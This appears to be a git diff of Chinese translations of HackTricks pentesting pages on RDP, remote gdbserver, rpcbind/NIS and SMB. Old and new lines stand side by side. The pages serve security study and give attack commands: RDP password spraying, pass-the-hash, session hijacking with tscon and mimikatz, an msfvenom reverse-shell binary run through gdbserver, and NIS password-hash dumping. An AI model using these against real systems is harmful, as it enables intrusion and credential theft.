**注意,您可能会锁定帐户**
**小心,您可能会锁定账户**
```bash
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
@ -61,15 +62,15 @@ rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
```
### 检查已知凭据是否适用于RDP服务
### 检查已知凭据是否适用于 RDP 服务
rdp\_check.py来自impacket让您可以检查某些凭据是否适用于RDP服务
rdp\_check.py 来自 impacket 让你检查某些凭据是否对 RDP 服务有效
```bash
rdp_check <domain>/<name>:<password>@<IP>
```
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,为他们节省时间深入挖掘、弹出 shell 并享受乐趣。
**即可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,提供20多种工具和功能从侦察到报告。我们不取代渗透测试人员 - 我们开发自定义工具、检测和利用模块以便让他们有更多时间深入挖掘、获取shell并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
@ -77,9 +78,9 @@ rdp_check <domain>/<name>:<password>@<IP>
### 会话劫持
拥有**系统权限**,您可以访问任何用户打开的 RDP 会话,而无需知道所有者的密码。
通过**SYSTEM权限**,您可以访问任何**用户打开的RDP会话**无需知道所有者的密码。
**获取打开的会话:**
**获取打开的会话:**
```
query user
```
@ -87,51 +88,51 @@ query user
```bash
tscon <ID> /dest:<SESSIONNAME>
```
现在您将进入所选的RDP会话并且您将使用仅限Windows工具和功能来模拟用户。
现在您将进入所选的 RDP 会话,并且您将仅使用 Windows 工具和功能来模拟用户。
**重要提示**当您访问活动的RDP会话时您将会将正在使用该会话的用户踢出
**重要**:当您访问一个活动的 RDP 会话时,您将使正在使用该会话的用户断开连接
您可以通过转储进程来获取密码,但这种方法速度更快,并且可以让您与用户的虚拟桌面进行交互(例如在记事本中查看密码而不会将其保存在磁盘中或者在其他计算机上打开的其他RDP会话...
您可以通过进程转储获取密码,但这种方法更快,并且可以让您与用户的虚拟桌面进行交互(密码在记事本中而未保存在磁盘上,其他机器上打开的其他 RDP 会话...
#### **Mimikatz**
您也可以使用Mimikatz来执行此操作
您也可以使用 mimikatz 来做到这一点
```bash
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
```
### Sticky-keys & Utilman
结合这种技术与**stickykeys**或**utilman您将能够随时访问管理CMD和任何RDP会话**
结合此技术与 **stickykeys****utilman您将能够随时访问管理CMD和任何RDP会话**
您可以使用以下命令搜索已经使用其中一种技术后门的RDP[https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
您可以使用以下链接搜索已经被这些技术后门化的RDP[https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
### RDP进程注入
### RDP Process Injection
如果来自不同域或**拥有更高权限的用户通过RDP登录**到您作为管理员的PC您可以**将您的beacon注入到他的RDP会话进程**中并扮演他的角色
如果来自不同域或具有 **更高权限的用户通过RDP登录** 到您是 **管理员** 的PC您可以 **注入** 您的信标到他的 **RDP会话进程** 中并以他的身份行动
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
{% endcontent-ref %}
### 将用户添加到RDP组
### Adding User to RDP group
```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```
## 自动工具
## 自动工具
* [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
**AutoRDPwn** 是一个使用 Powershell 创建的后渗透框架,主要设计用于自动化对 Microsoft Windows 计算机进行 **Shadow** 攻击。这个由 Microsoft 列为功能的漏洞允许远程攻击者在未经同意的情况下**查看受害者的桌面**,甚至可以根据需要控制受害者的桌面,使用操作系统本身的工具。
**AutoRDPwn** 是一个用 Powershell 创建的后期利用框架,主要用于自动化对 Microsoft Windows 计算机的 **Shadow** 攻击。此漏洞(被 Microsoft 列为一个特性)允许远程攻击者 **在未获得受害者同意的情况下查看其桌面**,甚至可以按需控制它,使用操作系统本身的本地工具。
* [**EvilRDP**](https://github.com/skelsec/evilrdp)
* 从命令行以自动化方式控制鼠标和键盘
* 从命令行以自动化方式控制剪贴板
* 从客户端生成一个通过 RDP 将网络通信引导到目标的 SOCKS 代理
* 在目标上执行任意 SHELL 和 PowerShell 命令而无需上传文件
* 即使目标上禁用文件传输,也可以与目标之间上传和下载文件
* 从客户端生成 SOCKS 代理,通过 RDP 将网络通信引导到目标
* 在目标上执行任意 SHELL 和 PowerShell 命令而无需上传文件
* 即使目标上禁用文件传输,也可以上传和下载文件到/从目标
## HackTricks 自动命令
## HackTricks 自动命令
```
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
@ -152,20 +153,21 @@ Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-inf
```
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**立即提供的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,为他们节省时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

52
network-services-pentesting/pentesting-remote-gdbserver.md
View file

@ -1,36 +1,37 @@
# 渗透测试远程 GdbServer
# Pentesting Remote GdbServer
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,拥有 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估与渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## **基本信息**
**gdbserver** 是一种工具,可以远程调试程序。它与需要调试的程序一起在同一系统上运行,称为“目标”。这种设置允许 **GNU 调试器** 从存储源代码和调试程序的二进制副本的不同机器“主机”连接。**gdbserver** 与调试器之间的连接可以通过 TCP 或串行线路进行,从而实现多功能调试设置。
**gdbserver** 是一个可以远程调试程序的工具。它与需要调试的程序在同一系统上并行运行,称为“目标”。这种设置允许 **GNU 调试器** 从不同的机器“主机”连接,主机上存储着源代码和被调试程序的二进制副本。**gdbserver** 和调试器之间的连接可以通过 TCP 或串行线路进行,允许灵活的调试设置。
您可以让 **gdbserver 在任何端口监听**,目前 **nmap 无法识别该服务**
您可以让 **gdbserver 在任何端口监听**,目前 **nmap 无法识别该服务**
## 利用
### 上传执行
### 上传执行
您可以使用 **msfvenom 轻松创建 elf 后门**,上传并执行
您可以轻松创建一个 **elf 后门与 msfvenom**,上传并执行它
```bash
# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
@ -55,7 +56,7 @@ run
```
### 执行任意命令
有另一种方法可以通过[此处获取的**python自定义脚本**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)使调试器执行任意命令。
还有另一种方法可以**通过** [**从这里获取的 python 自定义脚本**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target) **使调试器执行任意命令**
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345
@ -74,7 +75,7 @@ r
# Run the remote command, e.g. `ls`.
rcmd ls
```
首先**在本地创建脚本**
首先**在本地创建这个脚本**
{% code title="remote-cmd.py" %}
```python
@ -197,20 +198,21 @@ RemoteCmd()
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时提供的漏洞评估和渗透测试设置**。从侦察到报告,使用 20 多种工具和功能运行完整的渗透测试。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试提供20多个工具和功能从侦察到报告。我们不取代渗透测试人员 - 我们开发自定义工具、检测和利用模块以便让他们有更多时间深入挖掘、获取shell并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR来分享黑客技巧。
</details>
{% endhint %}

72
network-services-pentesting/pentesting-rpcbind.md
View file

@ -1,18 +1,19 @@
# 111/TCP/UDP - 渗透测试 Portmapper
# 111/TCP/UDP - Pentesting Portmapper
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -20,9 +21,9 @@
## 基本信息
**Portmapper** 是一用于将网络服务端口映射到 **RPC**(远程过程调用)程序编号的服务。它**Unix 系统**中的一个关键组件,促进这些系统之间的信息交换。与 **Portmapper** 关联的 **端口** 经常受到攻击者的扫描,因为它可以揭示有价值的信息。这些信息包括正在运行的 **Unix 操作系统OS** 的类型以及系统上可用服务的详细信息。此外,**Portmapper** 通常与 **NFS网络文件系统**、**NIS网络信息服务** 和其他基于 **RPC** 的服务一起使用,以有效管理网络服务。
**Portmapper** 是一用于将网络服务端口映射到 **RPC**(远程过程调用)程序编号的服务。它作为 **Unix** 系统中的一个关键组件,促进了这些系统之间的信息交换。与 **Portmapper** 相关的 **端口** 经常被攻击者扫描,因为它可以揭示有价值的信息。这些信息包括正在运行的 **Unix 操作系统 (OS)** 的类型以及系统上可用服务的详细信息。此外,**Portmapper** 通常与 **NFS网络文件系统**、**NIS网络信息服务** 和其他 **基于 RPC 的服务** 一起使用,以有效管理网络服务。
**默认端口:** 111/TCP/UDPOracle Solaris 中 32771
**默认端口:** 111/TCP/UDPOracle Solaris 中 32771
```
PORT STATE SERVICE
111/tcp open rpcbind
@ -32,27 +33,31 @@ PORT STATE SERVICE
rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```
有时它不会给你任何信息,而在其他情况下你会得到这样的内容:
![](<../.gitbook/assets/image (553).png>)
### Shodan
* `port:111 portmap`
## RPCBind + NFS
如果发现了 NFS 服务,那么可能您将能够列出、下载(也许还可以上传)文件:
如果你发现服务 NFS那么你可能能够列出和下载(也许还可以上传)文件:
![](<../.gitbook/assets/image (872).png>)
阅读[2049 - Pentesting NFS service](nfs-service-pentesting.md)以了解如何测试此协议。
阅读[ 2049 - Pentesting NFS service](nfs-service-pentesting.md)以了解更多关于如何测试此协议的信息
## NIS
探索 **NIS** 漏洞涉及一个两步骤的过程,首先识别服务 `ypbind`。这一探索的基石是揭示 **NIS 域名**,没有这个信息,进展将受阻
探索 **NIS** 漏洞涉及一个两步过程,首先识别服务 `ypbind`。这一探索的基石是揭示 **NIS 域名**,没有这个进展将会停止
![](<../.gitbook/assets/image (859).png>)
探索之旅始于安装必要的软件包(`apt-get install nis`)。随后的步骤需要使用 `ypwhich` 确认 NIS 服务器的存在,通过使用域名和服务器 IP 对其进行ping测试确保这些元素经过匿名化以确保安全性
探索之旅始于安装必要的包(`apt-get install nis`)。接下来的步骤需要使用 `ypwhich` 通过域名和服务器 IP 确认 NIS 服务器的存在,确保这些元素为安全而匿名化
最后、也是至关重要的一步是使用 `ypcat` 命令提取敏感数据,特别是加密的用户密码。这些哈希值一旦使用像 **John the Ripper** 这样的工具破解,将揭示有关系统访问和权限的见解。
最后一个也是至关重要的步骤涉及 `ypcat` 命令提取敏感数据,特别是加密的用户密码。这些哈希值一旦使用像 **John the Ripper** 这样的工具破解,将揭示系统访问和权限的见解。
```bash
# Install NIS tools
apt-get install nis
@ -63,24 +68,24 @@ ypcat d <domain-name> h <server-ip> passwd.byname
```
### NIF 文件
| **主文件** | **映射(s)** | **** |
| ---------------- | --------------------------- | --------------------------------- |
| /etc/hosts | hosts.byname, hosts.byaddr | 包含主机名和 IP 详细信息 |
| **主文件** | **映射** | **注** |
| ---------------- | -------------------------- | --------------------------------- |
| /etc/hosts | hosts.byname, hosts.byaddr | 包含主机名和 IP 详细信息 |
| /etc/passwd | passwd.byname, passwd.byuid | NIS 用户密码文件 |
| /etc/group | group.byname, group.bygid | NIS 组文件 |
| /usr/lib/aliases | mail.aliases | 详细的邮件别名 |
| /etc/group | group.byname, group.bygid | NIS 组文件 |
| /usr/lib/aliases | mail.aliases | 邮件别名详细信息 |
## RPC 用户
如果发现列出了 **rusersd** 服务,如下所示
如果你发现 **rusersd** 服务列出如下
![](<../.gitbook/assets/image (1041).png>)
您可以枚举该主机的用户。要了解如何进行操作,请阅读 [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md)。
你可以枚举该主机的用户。要了解如何,请阅读 [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md)。
## 绕过过滤的 Portmapper 端口
## 绕过过滤的 Portmapper 端口
在进行 **nmap 扫描** 时,发现开放的 NFS 端口中的端口 111 被过滤,直接利用这些端口是不可行的。然而,通过**在本地模拟一个 portmapper 服务,并从您的计算机创建到目标的隧道**,使用标准工具就变得可能了。这种技术允许绕过端口 111 的过滤状态,从而实现对 NFS 服务的访问。有关此方法的详细指导,请参考 [此链接](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) 上提供的文章。
在进行 **nmap 扫描** 并发现 NFS 端口开放且端口 111 被过滤时,直接利用这些端口是不可行的。然而,通过 **在本地模拟一个 portmapper 服务并从你的机器创建一个隧道到目标**,利用标准工具进行利用成为可能。这种技术允许绕过端口 111 的过滤状态,从而访问 NFS 服务。有关此方法的详细指导,请参阅 [此链接](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) 的文章。
## Shodan
@ -118,16 +123,17 @@ Name: nmap
Description: May give netstat-type info
Command: nmap -sSUC -p 111 {IP}
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现我们的独家[**NFTs**]收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

264
network-services-pentesting/pentesting-smb.md
View file

@ -1,58 +1,59 @@
# 139,445 - SMB渗透测试
# 139,445 - Pentesting SMB
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **端口139**
## **Port 139**
_**网络基本输入输出系统NetBIOS**_是一种软件协议旨在使局域网LAN中的应用程序、个人电脑和台式机能够与网络硬件进行交互并**促进数据在网络中的传输**。通过它们的NetBIOS名称来实现在NetBIOS网络上运行的软件应用程序的识别和定位这些名称最多可以有16个字符并且通常与计算机名称不同。两个应用程序之间的NetBIOS会话是通过一个应用程序作为客户端向另一个应用程序作为服务器发出“呼叫”命令来启动的使用**TCP端口139**
_**网络基本输入输出系统**_** (NetBIOS)** 是一种软件协议,旨在使局域网 (LAN) 内的应用程序、个人电脑和桌面能够与网络硬件交互,并**促进数据在网络中的传输**。通过其 NetBIOS 名称(长度可达 16 个字符,通常与计算机名称不同),可以识别和定位在 NetBIOS 网络上运行的软件应用程序。当一个应用程序(充当客户端)发出命令“呼叫”另一个应用程序(充当服务器)时,两个应用程序之间的 NetBIOS 会话通过**TCP 端口 139**启动
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## 端口445
## Port 445
从技术上讲,端口139被称为“NBT over IP”而端口445被标识为“SMB over IP”。缩写**SMB**代表“**Server Message Blocks**”,也被现代称为**Common Internet File System (CIFS)**。作为一个应用层网络协议SMB/CIFS主要用于实现文件、打印机、串行端口的共享访问并促进网络中节点之间各种形式的通信。
从技术上讲,端口 139 被称为“NBT over IP”而端口 445 被识别为“SMB over IP”。缩写 **SMB** 代表“**服务器消息块**”,现代也被称为 **通用互联网文件系统 (CIFS)**。作为一种应用层网络协议SMB/CIFS 主要用于实现对文件、打印机、串口的共享访问,并促进网络节点之间的各种形式的通信。
例如,在Windows环境中突出显示SMB可以直接通过TCP/IP运行消除了对NetBIOS over TCP/IP的必要性通过利用端口445。相反在不同系统上观察到使用端口139表明SMB与NetBIOS over TCP/IP一起执行。
例如,在 Windows 的上下文中,强调 SMB 可以直接通过 TCP/IP 操作,消除了通过端口 445 使用 NetBIOS over TCP/IP 的必要性。相反,在不同的系统上,观察到使用端口 139这表明 SMB 正在与 NetBIOS over TCP/IP 一起执行。
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
**Server Message Block (SMB)**协议以**客户端-服务器**模型运行旨在管理对文件、目录和其他网络资源如打印机和路由器的访问。SMB主要用于**Windows**操作系统系列确保向后兼容性使具有较新版本Microsoft操作系统的设备能够与运行较旧版本的设备无缝交互。此外,**Samba**项目提供了一个免费软件解决方案使SMB能够在**Linux**和Unix系统上实现从而通过SMB促进跨平台通信。
**服务器消息块 (SMB)** 协议在 **客户端-服务器** 模型中运行,旨在调节对 **文件**、目录和其他网络资源(如打印机和路由器)的 **访问**。主要用于 **Windows** 操作系统系列SMB 确保向后兼容性,使得运行较新版本微软操作系统的设备能够与运行较旧版本的设备无缝交互。此外,**Samba** 项目提供了一个免费软件解决方案,使SMB 能够在 **Linux** Unix 系统上实现,从而通过 SMB 促进跨平台通信。
